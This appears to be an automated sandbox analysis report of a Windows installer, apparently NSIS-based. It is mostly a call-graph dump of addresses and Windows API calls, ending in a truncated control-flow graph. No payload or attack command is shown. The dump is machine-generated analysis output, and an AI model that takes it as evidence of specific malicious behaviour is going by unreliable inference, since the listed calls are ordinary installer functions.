3453->3456 3457 4038a0 3454->3457 3456->3454 3557 403b4c 3457->3557 3460 405ae9 18 API calls 3461 403923 3460->3461 3462 4039b7 3461->3462 3464 405efa 3 API calls 3461->3464 3463 405ae9 18 API calls 3462->3463 3465 4039bd 3463->3465 3466 403955 3464->3466 3467 4039cd LoadImageW 3465->3467 3468 40604f 18 API calls 3465->3468 3466->3462 3473 403976 lstrlenW 3466->3473 3474 405a0e CharNextW 3466->3474 3469 403a73 3467->3469 3470 4039f4 RegisterClassW 3467->3470 3468->3467 3472 40140b 2 API calls 3469->3472 3471 403a2a SystemParametersInfoW CreateWindowExW 3470->3471 3502 403a7d 3470->3502 3471->3469 3479 403a79 3472->3479 3475 403984 lstrcmpiW 3473->3475 3476 4039aa 3473->3476 3477 403973 3474->3477 3475->3476 3478 403994 GetFileAttributesW 3475->3478 3480 4059e1 3 API calls 3476->3480 3477->3473 3481 4039a0 3478->3481 3482 403b4c 19 API calls 3479->3482 3479->3502 3483 4039b0 3480->3483 3481->3476 3484 405a2d 2 API calls 3481->3484 3485 403a8a 3482->3485 3567 40602d lstrcpynW 3483->3567 3484->3476 3487 403a96 ShowWindow 3485->3487 3488 403b19 3485->3488 3490 406397 3 API calls 3487->3490 3489 40525f 5 API calls 3488->3489 3491 403b1f 3489->3491 3492 403aae 3490->3492 3493 403b23 3491->3493 3494 403b3b 3491->3494 3495 403abc GetClassInfoW 3492->3495 3499 406397 3 API calls 3492->3499 3501 40140b 2 API calls 3493->3501 3493->3502 3498 40140b 2 API calls 3494->3498 3496 403ad0 GetClassInfoW RegisterClassW 3495->3496 3497 403ae6 DialogBoxParamW 3495->3497 3496->3497 3500 40140b 2 API calls 3497->3500 3498->3502 3499->3495 3500->3502 3501->3502 3502->3349 3503->3353 3569 40602d lstrcpynW 3504->3569 3506 405afa 3507 405a8c 4 API calls 3506->3507 3508 405b00 3507->3508 3509 40359c 3508->3509 3510 4062c1 5 API calls 3508->3510 3509->3349 3518 40602d lstrcpynW 3509->3518 3516 405b10 3510->3516 3511 405b41 lstrlenW 3512 405b4c 3511->3512 3511->3516 3513 4059e1 3 API calls 3512->3513 3515 405b51 GetFileAttributesW 3513->3515 3514 406370 2 API calls 3514->3516 3515->3509 3516->3509 3516->3511 3516->3514 3517 405a2d 2 API calls 3516->3517 3517->3511 3518->3385 3519->3354 3521 4037b4 3520->3521 3522 4037a6 CloseHandle 3520->3522 3570 4037e1 3521->3570 3522->3521 3527->3394 3528->3404 3530 405eef 3529->3530 3531 405ee2 3529->3531 3530->3404 3620 405d5c lstrcpyW 3531->3620 3534 405c3e GetTickCount GetTempFileNameW 3533->3534 3535 405c74 3534->3535 3536 40327b 3534->3536 3535->3534 3535->3536 3536->3339 3537->3421 3538->3423 3540 405a3b 3539->3540 3541 405a41 CharPrevW 3540->3541 3542 402e5a 3540->3542 3541->3540 3541->3542 3543 40602d lstrcpynW 3542->3543 3543->3427 3545 402d93 3544->3545 3546 402dab 3544->3546 3549 402da3 3545->3549 3550 402d9c DestroyWindow 3545->3550 3547 402db3 3546->3547 3548 402dbb GetTickCount 3546->3548 3551 406443 2 API calls 3547->3551 3552 402dc9 CreateDialogParamW ShowWindow 3548->3552 3553 402dec 3548->3553 3549->3430 3550->3549 3554 402db9 3551->3554 3552->3553 3553->3430 3554->3430 3555->3436 3556->3438 3558 403b60 3557->3558 3568 405f74 wsprintfW 3558->3568 3560 403bd1 3561 40604f 18 API calls 3560->3561 3562 403bdd SetWindowTextW 3561->3562 3563 403901 3562->3563 3564 403bf9 3562->3564 3563->3460 3564->3563 3565 40604f 18 API calls 3564->3565 3565->3564 3566->3457 3567->3462 3568->3560 3569->3506 3571 4037ef 3570->3571 3572 4037b9 3571->3572 3573 4037f4 FreeLibrary GlobalFree 3571->3573 3574 40581e 3572->3574 3573->3572 3573->3573 3575 405ae9 18 API calls 3574->3575 3576 40583e 3575->3576 3577 405846 DeleteFileW 3576->3577 3578 40585d 3576->3578 3579 4035cf OleUninitialize 3577->3579 3580 40597d 3578->3580 3610 40602d lstrcpynW 3578->3610 3579->3360 3579->3361 3580->3579 3585 406370 2 API calls 3580->3585 3582 405883 3583 405896 3582->3583 3584 405889 lstrcatW 3582->3584 3587 405a2d 2 API calls 3583->3587 3586 40589c 3584->3586 3588 4059a2 3585->3588 3589 4058ac lstrcatW 3586->3589 3590 4058b7 lstrlenW FindFirstFileW 3586->3590 3587->3586 3588->3579 3591 4059e1 3 API calls 3588->3591 3589->3590 3590->3580 3608 4058d9 3590->3608 3592 4059ac 3591->3592 3594 4057d6 5 API calls 3592->3594 3593 405960 FindNextFileW 3597 405976 FindClose 3593->3597 3593->3608 3596 4059b8 3594->3596 3598 4059d2 3596->3598 3599 4059bc 3596->3599 3597->3580 3601 40518c 25 API calls 3598->3601 3599->3579 3602 40518c 25 API calls 3599->3602 3601->3579 3604 4059c9 3602->3604 3603 40581e 62 API calls 3603->3608 3606 405ece 38 API calls 3604->3606 3605 40518c 25 API calls 3605->3593 3606->3579 3607 40518c 25 API calls 3607->3608 3608->3593 3608->3603 3608->3605 3608->3607 3609 405ece 38 API calls 3608->3609 3611 40602d lstrcpynW 3608->3611 3612 4057d6 3608->3612 3609->3608 3610->3582 3611->3608 3613 405bdd 2 API calls 3612->3613 3614 4057e2 3613->3614 3615 405803 3614->3615 3616 4057f1 RemoveDirectoryW 3614->3616 3617 4057f9 DeleteFileW 3614->3617 3615->3608 3618 4057ff 3616->3618 3617->3618 3618->3615 3619 40580f SetFileAttributesW 3618->3619 3619->3615 3621 405d84 3620->3621 3622 405daa GetShortPathNameW 3620->3622 3647 405c02 GetFileAttributesW CreateFileW 3621->3647 3624 405ec9 3622->3624 3625 405dbf 3622->3625 3624->3530 3625->3624 3627 405dc7 wsprintfA 3625->3627 3626 405d8e CloseHandle GetShortPathNameW 3626->3624 3628 405da2 3626->3628 3629 40604f 18 API calls 3627->3629 3628->3622 3628->3624 3630 405def 3629->3630 3648 405c02 GetFileAttributesW CreateFileW 3630->3648 3632 405dfc 3632->3624 3633 405e0b GetFileSize GlobalAlloc 3632->3633 3634 405ec2 CloseHandle 3633->3634 3635 405e2d 3633->3635 3634->3624 3636 405c85 ReadFile 3635->3636 3637 405e35 3636->3637 3637->3634 3649 405b67 lstrlenA 3637->3649 3640 405e60 3642 405b67 4 API calls 3640->3642 3641 405e4c lstrcpyA 3643 405e6e 3641->3643 3642->3643 3644 405ea5 SetFilePointer 3643->3644 3645 405cb4 WriteFile 3644->3645 3646 405ebb GlobalFree 3645->3646 3646->3634 3647->3626 3648->3632 3650 405ba8 lstrlenA 3649->3650 3651 405bb0 3650->3651 3652 405b81 lstrcmpiA 3650->3652 3651->3640 3651->3641 3652->3651 3653 405b9f CharNextA 3652->3653 3653->3650 3936 4014ff 3937 401507 3936->3937 3939 40151a 3936->3939 3938 402ba2 18 API calls 3937->3938 3938->3939 3940 401000 3941 401037 BeginPaint GetClientRect 3940->3941 3942 40100c DefWindowProcW 3940->3942 3944 4010f3 3941->3944 3945 401179 3942->3945 3946 401073 CreateBrushIndirect FillRect DeleteObject 3944->3946 3947 4010fc 3944->3947 3946->3944 3948 401102 CreateFontIndirectW 3947->3948 3949 401167 EndPaint 3947->3949 3948->3949 3950 401112 6 API calls 3948->3950 3949->3945 3950->3949 3951 405100 3952 405110 3951->3952 3953 405124 3951->3953 3954 405116 3952->3954 3955 40516d 3952->3955 3956 40512c IsWindowVisible 3953->3956 3962 405143 3953->3962 3958 40413d SendMessageW 3954->3958 3957 405172 CallWindowProcW 3955->3957 3956->3955 3959 405139 3956->3959 3960 405120 3957->3960 3958->3960 3964 404a56 SendMessageW 3959->3964 3962->3957 3969 404ad6 3962->3969 3965 404ab5 SendMessageW 3964->3965 3966 404a79 GetMessagePos ScreenToClient SendMessageW 3964->3966 3968 404aad 3965->3968 3967 404ab2 3966->3967 3966->3968 3967->3965 3968->3962 3978 40602d lstrcpynW 3969->3978 3971 404ae9 3979 405f74 wsprintfW 3971->3979 3973 404af3 3974 40140b 2 API calls 3973->3974 3975 404afc 3974->3975 3980 40602d lstrcpynW 3975->3980 3977 404b03 3977->3955 3978->3971 3979->3973 3980->3977 3981 402d04 3982 402d16 SetTimer 3981->3982 3984 402d2f 3981->3984 3982->3984 3983 402d84 3984->3983 3985 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3984->3985 3985->3983 3986 401904 3987 40193b 3986->3987 3988 402bbf 18 API calls 3987->3988 3989 401940 3988->3989 3990 40581e 69 API calls 3989->3990 3991 401949 3990->3991 3992 404205 lstrcpynW lstrlenW 3993 402786 3994 4029f7 3993->3994 3995 40278d 3993->3995 3996 402ba2 18 API calls 3995->3996 3997 402798 3996->3997 3998 40279f SetFilePointer 3997->3998 3998->3994 3999 4027af 3998->3999 4001 405f74 wsprintfW 3999->4001 4001->3994 4002 401907 4003 402bbf 18 API calls 4002->4003 4004 40190e 4003->4004 4005 405772 MessageBoxIndirectW 4004->4005 4006 401917 4005->4006 4007 401e08 4008 402bbf 18 API calls 4007->4008 4009 401e0e 4008->4009 4010 402bbf 18 API calls 4009->4010 4011 401e17 4010->4011 4012 402bbf 18 API calls 4011->4012 4013 401e20 4012->4013 4014 402bbf 18 API calls 4013->4014 4015 401e29 4014->4015 4016 401423 25 API calls 4015->4016 4017 401e30 ShellExecuteW 4016->4017 4018 401e61 4017->4018 4019 404b08 GetDlgItem GetDlgItem 4020 404b5a 7 API calls 4019->4020 4029 404d73 4019->4029 4021 404bf0 SendMessageW 4020->4021 4022 404bfd DeleteObject 4020->4022 4021->4022 4023 404c06 4022->4023 4024 404c3d 4023->4024 4028 40604f 18 API calls 4023->4028 4025 4040f1 19 API calls 4024->4025 4030 404c51 4025->4030 4026 404f03 4031 404f15 4026->4031 4032 404f0d SendMessageW 4026->4032 4027 404e57 4027->4026 4036 404eb0 SendMessageW 4027->4036 4062 404d66 4027->4062 4033 404c1f SendMessageW SendMessageW 4028->4033 4029->4027 4034 404a56 5 API calls 4029->4034 4054 404de4 4029->4054 4035 4040f1 19 API calls 4030->4035 4039 404f27 ImageList_Destroy 4031->4039 4040 404f2e 4031->4040 4049 404f3e 4031->4049 4032->4031 4033->4023 4034->4054 4055 404c5f 4035->4055 4041 404ec5 SendMessageW 4036->4041 4036->4062 4037 404158 8 API calls 4042 4050f9 4037->4042 4038 404e49 SendMessageW 4038->4027 4039->4040 4043 404f37 GlobalFree 4040->4043 4040->4049 4045 404ed8 4041->4045 4043->4049 4044 404d34 GetWindowLongW SetWindowLongW 4048 404d4d 4044->4048 4057 404ee9 SendMessageW 4045->4057 4046 4050ad 4047 4050bf ShowWindow GetDlgItem ShowWindow 4046->4047 4046->4062 4047->4062 4050 404d53 ShowWindow 4048->4050 4051 404d6b 4048->4051 4049->4046 4061 404ad6 4 API calls 4049->4061 4066 404f79 4049->4066 4070 404126 SendMessageW 4050->4070 4071 404126 SendMessageW 4051->4071 4054->4027 4054->4038 4055->4044 4056 404caf SendMessageW 4055->4056 4058 404d2e 4055->4058 4059 404ceb SendMessageW 4055->4059 4060 404cfc SendMessageW 4055->4060 4056->4055 4057->4026 4058->4044 4058->4048 4059->4055 4060->4055 4061->4066 4062->4037 4063 405083 InvalidateRect 4063->4046 4064 405099 4063->4064 4072 404a11 4064->4072 4065 404fa7 SendMessageW 4069 404fbd 4065->4069 4066->4065 4066->4069 4068 405031 SendMessageW SendMessageW 4068->4069 4069->4063 4069->4068 4070->4062 4071->4029 4075 404948 4072->4075 4074 404a26 4074->4046 4076 404961 4075->4076 4077 40604f 18 API calls 4076->4077 4078 4049c5 4077->4078 4079 40604f 18 API calls 4078->4079 4080 4049d0 4079->4080 4081 40604f 18 API calls 4080->4081 4082 4049e6 lstrlenW wsprintfW SetDlgItemTextW 4081->4082 4082->4074 4088 40458c 4089 4045b8 4088->4089 4090 4045c9 4088->4090 4149 405756 GetDlgItemTextW 4089->4149 4092 4045d5 GetDlgItem 4090->4092 4097 404634 4090->4097 4094 4045e9 4092->4094 4093 4045c3 4096 4062c1 5 API calls 4093->4096 4099 4045fd SetWindowTextW 4094->4099 4104 405a8c 4 API calls 4094->4104 4095 404718 4146 4048c7 4095->4146 4151 405756 GetDlgItemTextW 4095->4151 4096->4090 4097->4095 4101 40604f 18 API calls 4097->4101 4097->4146 4102 4040f1 19 API calls 4099->4102 4100 404748 4105 405ae9 18 API calls 4100->4105 4106 4046a8 SHBrowseForFolderW 4101->4106 4107 404619 4102->4107 4103 404158 8 API calls 4108 4048db 4103->4108 4109 4045f3 4104->4109 4110 40474e 4105->4110 4106->4095 4111 4046c0 CoTaskMemFree 4106->4111 4112 4040f1 19 API calls 4107->4112 4109->4099 4113 4059e1 3 API calls 4109->4113 4152 40602d lstrcpynW 4110->4152 4114 4059e1 3 API calls 4111->4114 4115 404627 4112->4115 4113->4099 4116 4046cd 4114->4116 4150 404126 SendMessageW 4115->4150 4119 404704 SetDlgItemTextW 4116->4119 4124 40604f 18 API calls 4116->4124 4119->4095 4120 40462d 4122 406407 5 API calls 4120->4122 4121 404765 4123 406407 5 API calls 4121->4123 4122->4097 4131 40476c 4123->4131 4125 4046ec lstrcmpiW 4124->4125 4125->4119 4128 4046fd lstrcatW 4125->4128 4126 4047ad 4153 40602d lstrcpynW 4126->4153 4128->4119 4129 4047b4 4130 405a8c 4 API calls 4129->4130 4132 4047ba GetDiskFreeSpaceW 4130->4132 4131->4126 4134 405a2d 2 API calls 4131->4134 4136 404805 4131->4136 4135 4047de MulDiv 4132->4135 4132->4136 4134->4131 4135->4136 4137 404a11 21 API calls 4136->4137 4147 404876 4136->4147 4140 404863 4137->4140 4138 404899 4154 404113 KiUserCallbackDispatcher 4138->4154 4139 40140b 2 API calls 4139->4138 4142 404878 SetDlgItemTextW 4140->4142 4143 404868 4140->4143 4142->4147 4145 404948 21 API calls 4143->4145 4144 4048b5 4144->4146 4155 404521 4144->4155 4145->4147 4146->4103 4147->4138 4147->4139 4149->4093 4150->4120 4151->4100 4152->4121 4153->4129 4154->4144 4156 404534 SendMessageW 4155->4156 4157 40452f 4155->4157 4156->4146 4157->4156 4158 40428e 4160 4042a6 4158->4160 4162 4043c0 4158->4162 4159 40442a 4161 4044fc 4159->4161 4163 404434 GetDlgItem 4159->4163 4164 4040f1 19 API calls 4160->4164 4169 404158 8 API calls 4161->4169 4162->4159 4162->4161 4167 4043fb GetDlgItem SendMessageW 4162->4167 4165 4044bd 4163->4165 4166 40444e 4163->4166 4168 40430d 4164->4168 4165->4161 4174 4044cf 4165->4174 4166->4165 4173 404474 6 API calls 4166->4173 4189 404113 KiUserCallbackDispatcher 4167->4189 4171 4040f1 19 API calls 4168->4171 4172 4044f7 4169->4172 4176 40431a CheckDlgButton 4171->4176 4173->4165 4177 4044e5 4174->4177 4178 4044d5 SendMessageW 4174->4178 4175 404425 4180 404521 SendMessageW 4175->4180 4187 404113 KiUserCallbackDispatcher 4176->4187 4177->4172 4179 4044eb SendMessageW 4177->4179 4178->4177 4179->4172 4180->4159 4182 404338 GetDlgItem 4188 404126 SendMessageW 4182->4188 4184 40434e SendMessageW 4185 404374 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4184->4185 4186 40436b GetSysColor 4184->4186 4185->4172 4186->4185 4187->4182 4188->4184 4189->4175 4190 401a15 4191 402bbf 18 API calls 4190->4191 4192 401a1e ExpandEnvironmentStringsW 4191->4192 4193 401a32 4192->4193 4195 401a45 4192->4195 4194 401a37 lstrcmpW 4193->4194 4193->4195 4194->4195 4196 402515 4197 402bbf 18 API calls 4196->4197 4198 40251c 4197->4198 4201 405c02 GetFileAttributesW CreateFileW 4198->4201 4200 402528 4201->4200 4202 402095 4203 402bbf 18 API calls 4202->4203 4204 40209c 4203->4204 4205 402bbf 18 API calls 4204->4205 4206 4020a6 4205->4206 4207 402bbf 18 API calls 4206->4207 4208 4020b0 4207->4208 4209 402bbf 18 API calls 4208->4209 4210 4020ba 4209->4210 4211 402bbf 18 API calls 4210->4211 4213 4020c4 4211->4213 4212 402103 CoCreateInstance 4217 402122 4212->4217 4213->4212 4214 402bbf 18 API calls 4213->4214 4214->4212 4215 401423 25 API calls 4216 4021e1 4215->4216 4217->4215 4217->4216 4218 401b16 4219 402bbf 18 API calls 4218->4219 4220 401b1d 4219->4220 4221 402ba2 18 API calls 4220->4221 4222 401b26 wsprintfW 4221->4222 4223 402a4c 4222->4223 3077 403c19 3078 403c31 3077->3078 3079 403d6c 3077->3079 3078->3079 3080 403c3d 3078->3080 3081 403dbd 3079->3081 3082 403d7d GetDlgItem GetDlgItem 3079->3082 3084 403c48 SetWindowPos 3080->3084 3085 403c5b 3080->3085 3083 403e17 3081->3083 3091 401389 2 API calls 3081->3091 3086 4040f1 19 API calls 3082->3086 3092 403d67 3083->3092 3147 40413d 3083->3147 3084->3085 3088 403c60 ShowWindow 3085->3088 3089 403c78 3085->3089 3090 403da7 SetClassLongW 3086->3090 3088->3089 3093 403c80 DestroyWindow 3089->3093 3094 403c9a 3089->3094 3095 40140b 2 API calls 3090->3095 3096 403def 3091->3096 3097 40407a 3093->3097 3098 403cb0 3094->3098 3099 403c9f SetWindowLongW 3094->3099 3095->3081 3096->3083 3102 403df3 SendMessageW 3096->3102 3097->3092 3108 4040ab ShowWindow 3097->3108 3100 403d59 3098->3100 3101 403cbc GetDlgItem 3098->3101 3099->3092 3166 404158 3100->3166 3105 403cec 3101->3105 3106 403ccf SendMessageW IsWindowEnabled 3101->3106 3102->3092 3103 40140b 2 API calls 3116 403e29 3103->3116 3104 40407c DestroyWindow EndDialog 3104->3097 3110 403cf9 3105->3110 3112 403d40 SendMessageW 3105->3112 3113 403d0c 3105->3113 3122 403cf1 3105->3122 3106->3092 3106->3105 3108->3092 3109 40604f 18 API calls 3109->3116 3110->3112 3110->3122 3111 4040f1 19 API calls 3111->3116 3112->3100 3117 403d14 3113->3117 3118 403d29 3113->3118 3115 403d27 3115->3100 3116->3092 3116->3103 3116->3104 3116->3109 3116->3111 3138 403fbc DestroyWindow 3116->3138 3150 4040f1 3116->3150 3160 40140b 3117->3160 3119 40140b 2 API calls 3118->3119 3121 403d30 3119->3121 3121->3100 3121->3122 3163 4040ca 3122->3163 3124 403ea4 GetDlgItem 3125 403ec1 ShowWindow KiUserCallbackDispatcher 3124->3125 3126 403eb9 3124->3126 3153 404113 KiUserCallbackDispatcher 3125->3153 3126->3125 3128 403eeb EnableWindow 3131 403eff 3128->3131 3129 403f04 GetSystemMenu EnableMenuItem SendMessageW 3130 403f34 SendMessageW 3129->3130 3129->3131 3130->3131 3131->3129 3154 404126 SendMessageW 3131->3154 3155 40602d lstrcpynW 3131->3155 3134 403f62 lstrlenW 3135 40604f 18 API calls 3134->3135 3136 403f78 SetWindowTextW 3135->3136 3156 401389 3136->3156 3138->3097 3139 403fd6 CreateDialogParamW 3138->3139 3139->3097 3140 404009 3139->3140 3141 4040f1 19 API calls 3140->3141 3142 404014 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3141->3142 3143 401389 2 API calls 3142->3143 3144 40405a 3143->3144 3144->3092 3145 404062 ShowWindow 3144->3145 3146 40413d SendMessageW 3145->3146 3146->3097 3148 404155 3147->3148 3149 404146 SendMessageW 3147->3149 3148->3116 3149->3148 3151 40604f 18 API calls 3150->3151 3152 4040fc SetDlgItemTextW 3151->3152 3152->3124 3153->3128 3154->3131 3155->3134 3158 401390 3156->3158 3157 4013fe 3157->3116 3158->3157 3159 4013cb MulDiv SendMessageW 3158->3159 3159->3158 3161 401389 2 API calls 3160->3161 3162 401420 3161->3162 3162->3122 3164 4040d1 3163->3164 3165 4040d7 SendMessageW 3163->3165 3164->3165 3165->3115 3167 404170 GetWindowLongW 3166->3167 3168 4041f9 3166->3168 3167->3168 3169 404181 3167->3169 3168->3092 3170 404190 GetSysColor 3169->3170 3171 404193 3169->3171 3170->3171 3172 4041a3 SetBkMode 3171->3172 3173 404199 SetTextColor 3171->3173 3174 4041c1 3172->3174 3175 4041bb GetSysColor 3172->3175 3173->3172 3176 4041d2 3174->3176 3177 4041c8 SetBkColor 3174->3177 3175->3174 3176->3168 3178 4041e5 DeleteObject 3176->3178 3179 4041ec CreateBrushIndirect 3176->3179 3177->3176 3178->3179 3179->3168 3315 40159b 3316 402bbf 18 API calls 3315->3316 3317 4015a2 SetFileAttributesW 3316->3317 3318 4015b4 3317->3318 4224 401f1d 4225 402bbf 18 API calls 4224->4225 4226 401f24 4225->4226 4227 406407 5 API calls 4226->4227 4228 401f33 4227->4228 4229 401fb7 4228->4229 4230 401f4f GlobalAlloc 4228->4230 4230->4229 4231 401f63 4230->4231 4232 406407 5 API calls 4231->4232 4233 401f6a 4232->4233 4234 406407 5 API calls 4233->4234 4235 401f74 4234->4235 4235->4229 4239 405f74 wsprintfW 4235->4239 4237 401fa9 4240 405f74 wsprintfW 4237->4240 4239->4237 4240->4229 4241 40229d 4242 4022a5 4241->4242 4245 4022ab 4241->4245 4243 402bbf 18 API calls 4242->4243 4243->4245 4244 402bbf 18 API calls 4246 4022b9 4244->4246 4245->4244 4245->4246 4247 402bbf 18 API calls 4246->4247 4249 4022c7 4246->4249 4247->4249 4248 402bbf 18 API calls 4250 4022d0 WritePrivateProfileStringW 4248->4250 4249->4248 4251 40149e 4252 402288 4251->4252 4253 4014ac PostQuitMessage 4251->4253 4253->4252 4254 40249e 4264 402cc9 4254->4264 4256 4024a8 4257 402ba2 18 API calls 4256->4257 4258 4024b1 4257->4258 4259 4024d5 RegEnumValueW 4258->4259 4260 4024c9 RegEnumKeyW 4258->4260 4262 40281e 4258->4262 4261 4024ee RegCloseKey 4259->4261 4259->4262 4260->4261 4261->4262 4265 402bbf 18 API calls 4264->4265 4266 402ce2 4265->4266 4267 402cf0 RegOpenKeyExW 4266->4267 4267->4256 4268 40231f 4269 402324 4268->4269 4270 40234f 4268->4270 4271 402cc9 19 API calls 4269->4271 4272 402bbf 18 API calls 4270->4272 4273 40232b 4271->4273 4274 402356 4272->4274 4275 402bbf 18 API calls 4273->4275 4278 40236c 4273->4278 4279 402bff RegOpenKeyExW 4274->4279 4276 40233c RegDeleteValueW RegCloseKey 4275->4276 4276->4278 4280 402c2a 4279->4280 4287 402c76 4279->4287 4281 402c50 RegEnumKeyW 4280->4281 4282 402c62 RegCloseKey 4280->4282 4283 402c87 RegCloseKey 4280->4283 4285 402bff 5 API calls 4280->4285 4281->4280 4281->4282 4284 406407 5 API calls 4282->4284 4283->4287 4286 402c72 4284->4286 4285->4280 4286->4287 4288 402ca2 RegDeleteKeyW 4286->4288 4287->4278 4288->4287 4289 401ca3 4290 402ba2 18 API calls 4289->4290 4291 401ca9 IsWindow 4290->4291 4292 401a05 4291->4292 4293 402a27 SendMessageW 4294 402a41 InvalidateRect 4293->4294 4295 402a4c 4293->4295 4294->4295 4296 40242a 4297 402cc9 19 API calls 4296->4297 4298 402434 4297->4298 4299 402bbf 18 API calls 4298->4299 4300 40243d 4299->4300 4301 402448 RegQueryValueExW 4300->4301 4305 40281e 4300->4305 4302 40246e RegCloseKey 4301->4302 4303 402468 4301->4303 4302->4305 4303->4302 4307 405f74 wsprintfW 4303->4307 4307->4302 4308 40172d 4309 402bbf 18 API calls 4308->4309 4310 401734 SearchPathW 4309->4310 4311 40174f 4310->4311 4312 403834 4313 40383f 4312->4313 4314 403843 4313->4314 4315 403846 GlobalAlloc 4313->4315 4315->4314 4316 4027b4 4317 4027ba 4316->4317 4318 4027c2 FindClose 4317->4318 4319 402a4c 4317->4319 4318->4319 4320 401b37 4321 401b44 4320->4321 4322 401b88 4320->4322 4323 401bcd 4321->4323 4328 401b5b 4321->4328 4324 401bb2 GlobalAlloc 4322->4324 4325 401b8d 4322->4325 4327 40604f 18 API calls 4323->4327 4332 402288 4323->4332 4326 40604f 18 API calls 4324->4326 4325->4332 4341 40602d lstrcpynW 4325->4341 4326->4323 4331 402282 4327->4331 4339 40602d lstrcpynW 4328->4339 4334 405772 MessageBoxIndirectW 4331->4334 4333 401b9f GlobalFree 4333->4332 4334->4332 4335 401b6a 4340 40602d lstrcpynW 4335->4340 4337 401b79 4342 40602d lstrcpynW 4337->4342 4339->4335 4340->4337 4341->4333 4342->4332 4343 402537 4344 402562 4343->4344 4345 40254b 4343->4345 4347 402596 4344->4347 4348 402567 4344->4348 4346 402ba2 18 API calls 4345->4346 4354 402552 4346->4354 4349 402bbf 18 API calls 4347->4349 4350 402bbf 18 API calls 4348->4350 4351 40259d lstrlenW 4349->4351 4352 40256e WideCharToMultiByte lstrlenA 4350->4352 4351->4354 4352->4354 4353 4025ca 4355 405cb4 WriteFile 4353->4355 4357 4025e0 4353->4357 4354->4353 4356 405ce3 5 API calls 4354->4356 4354->4357 4355->4357 4356->4353 4358 4014b8 4359 4014be 4358->4359 4360 401389 2 API calls 4359->4360 4361 4014c6 4360->4361 3180 4015b9 3181 402bbf 18 API calls 3180->3181 3182 4015c0 3181->3182 3200 405a8c CharNextW CharNextW 3182->3200 3184 401629 3186 40165b 3184->3186 3187 40162e 3184->3187 3185 405a0e CharNextW 3195 4015c9 3185->3195 3190 401423 25 API calls 3186->3190 3206 401423 3187->3206 3198 401653 3190->3198 3194 401642 SetCurrentDirectoryW 3194->3198 3195->3184 3195->3185 3196 4015f2 3195->3196 3197 40160f GetFileAttributesW 3195->3197 3210 4056f5 3195->3210 3218 4056d8 CreateDirectoryW 3195->3218 3196->3195 3213 40565b CreateDirectoryW 3196->3213 3197->3195 3201 405aa9 3200->3201 3202 405abb 3200->3202 3201->3202 3203 405ab6 CharNextW 3201->3203 3204 405a0e CharNextW 3202->3204 3205 405adf 3202->3205 3203->3205 3204->3202 3205->3195 3207 40518c 25 API calls 3206->3207 3208 401431 3207->3208 3209 40602d lstrcpynW 3208->3209 3209->3194 3221 406407 GetModuleHandleA 3210->3221 3214 4056a8 3213->3214 3215 4056ac GetLastError 3213->3215 3214->3196 3215->3214 3216 4056bb SetFileSecurityW 3215->3216 3216->3214 3217 4056d1 GetLastError 3216->3217 3217->3214 3219 4056ec GetLastError 3218->3219 3220 4056e8 3218->3220 3219->3220 3220->3195 3222 406423 3221->3222 3223 40642d GetProcAddress 3221->3223 3227 406397 GetSystemDirectoryW 3222->3227 3225 4056fc 3223->3225 3225->3195 3226 406429 3226->3223 3226->3225 3228 4063b9 wsprintfW LoadLibraryExW 3227->3228 3228->3226 4368 40293b 4369 402ba2 18 API calls 4368->4369 4370 402941 4369->4370 4371 402964 4370->4371 4372 40297d 4370->4372 4380 40281e 4370->4380 4375 402969 4371->4375 4376 40297a 4371->4376 4373 402993 4372->4373 4374 402987 4372->4374 4378 40604f 18 API calls 4373->4378 4377 402ba2 18 API calls 4374->4377 4382 40602d lstrcpynW 4375->4382 4383 405f74 wsprintfW 4376->4383 4377->4380 4378->4380 4382->4380 4383->4380 4384 40423f lstrlenW 4385 404260 WideCharToMultiByte 4384->4385 4386 40425e 4384->4386 4386->4385

                                                                        Executed Functions

                                                                        Function 0040327D Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 401stringfilecomCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 40327d-4032b0 SetErrorMode GetVersion 1 4032b2-4032ba call 406407 0->1 2 4032c3 0->2 1->2 7 4032bc 1->7 4 4032c8-4032dc call 406397 lstrlenA 2->4 9 4032de-403352 call 406407 * 2 #17 OleInitialize SHGetFileInfoW call 40602d GetCommandLineW call 40602d GetModuleHandleW 4->9 7->2 18 403354-40335b 9->18 19 40335c-403376 call 405a0e CharNextW 9->19 18->19 22 40337c-403382 19->22 23 40348d-4034a7 GetTempPathW call 40324c 19->23 25 403384-403389 22->25 26 40338b-40338f 22->26 30 4034a9-4034c7 GetWindowsDirectoryW lstrcatW call 40324c 23->30 31 4034ff-403519 DeleteFileW call 402dee 23->31 25->25 25->26 28 403391-403395 26->28 29 403396-40339a 26->29 28->29 32 4033a0-4033a6 29->32 33 403459-403466 call 405a0e 29->33 30->31 48 4034c9-4034f9 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40324c 30->48 51 4035ca-4035da call 40379c OleUninitialize 31->51 52 40351f-403525 31->52 37 4033c1-4033fa 32->37 38 4033a8-4033b0 32->38 49 403468-403469 33->49 50 40346a-403470 33->50 41 403417-403451 37->41 42 4033fc-403401 37->42 39 4033b2-4033b5 38->39 40 4033b7 38->40 39->37 39->40 40->37 41->33 47 403453-403457 41->47 42->41 46 403403-40340b 42->46 54 403412 46->54 55 40340d-403410 46->55 47->33 56 403478-403486 call 40602d 47->56 48->31 48->51 49->50 50->22 58 403476 50->58 69 403700-403706 51->69 70 4035e0-4035f0 call 405772 ExitProcess 51->70 59 4035ba-4035c1 call 403876 52->59 60 40352b-403536 call 405a0e 52->60 54->41 55->41 55->54 66 40348b 56->66 58->66 68 4035c6 59->68 71 403584-40358e 60->71 72 403538-40356d 60->72 66->23 68->51 74 403784-40378c 69->74 75 403708-40371e GetCurrentProcess OpenProcessToken 69->75 79 403590-40359e call 405ae9 71->79 80 4035f6-40360a call 4056f5 lstrcatW 71->80 76 40356f-403573 72->76 77 403792-403796 ExitProcess 74->77 78 40378e 74->78 82 403720-40374e LookupPrivilegeValueW AdjustTokenPrivileges 75->82 83 403754-403762 call 406407 75->83 84 403575-40357a 76->84 85 40357c-403580 76->85 78->77 79->51 95 4035a0-4035b6 call 40602d * 2 79->95 96 403617-403631 lstrcatW lstrcmpiW 80->96 97 40360c-403612 lstrcatW 80->97 82->83 93 403770-40377b ExitWindowsEx 83->93 94 403764-40376e 83->94 84->85 89 403582 84->89 85->76 85->89 89->71 93->74 98 40377d-40377f call 40140b 93->98 94->93 94->98 95->59 